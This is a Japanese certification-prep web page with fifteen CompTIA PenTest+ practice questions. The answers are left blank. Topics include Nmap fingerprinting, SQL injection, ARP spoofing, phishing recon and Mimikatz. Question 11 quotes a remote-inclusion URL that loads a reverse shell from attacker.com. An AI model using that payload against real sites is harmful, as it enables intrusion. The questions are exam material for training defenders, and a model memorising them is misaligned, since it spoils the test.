IT認証試験問題集
毎月、GOWUKAKUは1500人以上の受験者が試験準備を助けて、試験に合格するために受験者にご協力します
 ホームページ / PT0-001 問題集  / PT0-001 問題練習

CompTIA PT0-001 問題練習

CompTIA PenTest+ Certification Exam 試験

最新更新時間: 2024/03/19,合計145問。

【2024年3月キャンペーン】:PT0-001 最新真題を買う時、日本語版と英語版両方を同時に獲得できます。

実際の問題集を練習し、試験のポイントを了解し、テストに申し込むするかどうかを決めることができます。

さらに試験準備時間の35%を節約するには、PT0-001 問題集を使用してください。

 / 6

Question No : 1
Which of the following reasons does penetration tester needs to have a customer's point-of -contact information available at all time? (Select THREE).

正解:

Question No : 2
A penetration tester has been assigned to perform an external penetration assessment of a company .
Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)

正解:

Question No : 3
Joe, an attacker, intends to transfer funds discreetly from a victim’s account to his own .
Which of the following URLs can he use to accomplish this attack?

正解:

Question No : 4
The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test .
Which of the following are the MOST likely causes for this difference? (Select TWO)

正解:

Question No : 5
A company received a report with the following finding . While on the internal network the penetration tester was able to successfully capture SMB broadcasted user ID and password information on the network and decode this information. This allowed the penetration tester to then join their own computer to the ABC domain.
Which of the following remediation’s are appropriate for the reported findings'? (Select TWO)

正解:

Question No : 6
A consultant is identifying versions of Windows operating systems on a network.
Which of the following Nmap commands should the consultant run?

正解:

Question No : 7
While conducting information gathering, a penetration tester is trying to identify Windows hosts .
Which of the following characteristics would be BEST to use for fingerprinting?

正解:
Explanation:
Reference: https://social.technet.microsoft.com/Forums/windowsserver/en-US/67920af3-f60e-43dc-9941-feca54380b52/default-ttl-for-various-oss?forum=winserverpowershell#:~:text=The%20Default%20Ttl%20for%20windows,default%20for%20Unix%20is%2064

Question No : 8
A penetration tester has been hired to perform a penetration test for an organization .
Which of the following is indicative of an error-based SQL injection attack?

正解:

Question No : 9
A penetration tester is designing a phishing campaign and wants to build list of users (or the target organization .
Which of the following techniques would be the MOST appropriate? (Select TWO)

正解:

Question No : 10
A penetration tester is performing ARP spoofing against a switch .
Which of the following should the penetration tester spoof to get the MOST information?

正解:

Question No : 11
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?

正解:

Question No : 12
During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.
Which of the following registry changes would allow for credential caching in memory?

正解:

Question No : 13
Given the following Python code:
a = 'abcdefghijklmnop'
a[::2]
Which of the following will result?

正解:
Explanation:
Reference: https://blog.finxter.com/python-double-colon/

Question No : 14
A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode .
Which of the following steps must the firm take before it can run a static code analyzer?

正解:

Question No : 15
An attacker is attempting to gain unauthorized access to a WiR network that uses WPA2-PSK.
Which of the following attack vectors would the attacker MOST likely use?

正解:

 / 6